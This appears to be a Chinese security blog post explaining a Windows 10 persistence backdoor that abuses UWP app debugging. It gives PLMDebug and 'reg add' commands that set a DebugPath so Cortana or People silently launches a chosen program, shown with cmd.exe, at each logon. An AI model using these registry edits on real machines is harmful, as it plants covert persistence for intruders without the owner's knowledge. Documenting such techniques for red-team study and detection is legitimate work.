universal windows platform_Windows通用应用平台UWP持久化

最新推荐文章于 2024-08-09 07:17:57 发布

weixin_39536010

最新推荐文章于 2024-08-09 07:17:57 发布

阅读量642

点赞数

文章标签： universal windows platform

声明：公众号大部分文章来自团队核心成员和知识星球成员，少部分文章经过原作者授权和其它公众号白名单转载。未经授权，严禁转载，如需转载，请联系开白！

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者及本公众号无关！！！

START

0x01前言

这种权限维持方式也是一种自启动后门，但仅支持Windows10通用应用平台(UWP)上的应用程序，如：Cortana和People，通过将它置于调试模式后并配合Process Monitor工具可以找到UWP应用对应的注册表位置，然后修改为我们要执行的恶意程序，当目标机器注销/重启系统登录时就会执行这个恶意程序，原文地址： https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx 。

0x02列出软件包名称

首先我们需要找出当前系统完整的软件包名称，因为后边PLMDebug调试时要用到，可以使用以下命令列出所有的软件包，这里仅显示name、packagefullname。

Get-AppxPackage | select name,packagefullname

0x03安装PLMDebug

PLMDebug.exe包含在Windows调试工具中，所以我们只需要安装Windows 10 SDK即可，安装过程中只要选择“Debugging Tools for Windows”这一项就好了。

0x04调试Cortana软件包

使用以下命令调试Cortana软件包，然后在开始菜单中打开Cortana，胡乱点一下，稍等片刻即可弹出cmd.exe。

plmdebug.exe /enabledebug Microsoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy C:\Windows\System32\cmd.exe

Process Monitor监视到了它的注册表位置，而且发现写入了大量相关注册表项和值，所有注册表项的值都是：C:\Windows\System32\cmd.exe，不过只要注销/重启系统后就没有了。还在调试过程中发现这些行为都是由sihost.exe产生，所以我们只要在Process Monitor过滤器中仅显示包含sihost.exe进程即可显示出来。

0x05修改Cortana注册表

通过以下两条命令都可以实现持久化，方法都是一样的，只是注册表位置不一样，第一条会损坏原有的Cortana程序，无法正常运行，第二条不会损坏原有的Cortana程序，可以正常运行。修改以下注册表项时必须确定与你当前系统的UWP应用程序版本相对应，否则后门不会被触发。

People人脉：

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:\Windows\System32\cmd.exe"reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe\DebugInformation\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:\Windows\System32\cmd.exe"

Cortana(小娜)：

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy /d "C:\Windows\System32\cmd.exe"reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy\DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:\Windows\System32\cmd.exe"

注：笔者在当前测试环境下设置好了Cortana后门，在注销/重启系统登录时会执行1次，进入系统后每间隔5-20分钟左右会执行1次，这应该是微软后台自动运行了Cortana(小娜)，所以会再次触发该后门，没有找到相关资料，具体原因不清楚，全靠猜，0.0 ！！！

END

免费星球：要求每个人在两周内输出一篇文章发到星球里面，文章为星球成员自己整理的内容，如超过两周没有文章输出的将被拉黑一个月，超过3次将被踢出星球，永久禁止加入！

收费星球：进入的星球成员可以在里面学习一年，包括贝塔安全实验室整理好的学习资料，可让星球管理及合伙人邀请加入免费星球，可以不用发文章，加入的免费星球免踢一年！